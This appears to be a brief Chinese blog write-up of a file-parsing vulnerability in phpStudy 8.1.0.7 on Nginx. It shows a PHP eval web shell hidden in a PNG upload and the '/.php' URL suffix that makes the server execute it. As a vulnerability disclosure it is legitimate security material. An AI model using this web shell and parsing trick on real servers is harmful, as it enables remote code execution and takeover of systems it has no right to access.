phpstudy(小皮版本) 8.1.0.7文件解析漏洞

  • A+
所属分类:安全文章

测试环境

  • win 10

  • Phpstudy(小皮版本) 8.1.0.7

  • Nginx 1.15.11

  • Php 7.3.4

启动phpstudy

phpstudy(小皮版本) 8.1.0.7文件解析漏洞

准备一张图片 shell.png,然后进行图片上传

<?php @eval($_GET[value]);?>

可以发现图片已经上传到服务器

phpstudy(小皮版本) 8.1.0.7文件解析漏洞

然后我们进行访问,发现只需在后加上/.php就可以造成任意文件解析漏洞

phpstudy(小皮版本) 8.1.0.7文件解析漏洞




发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: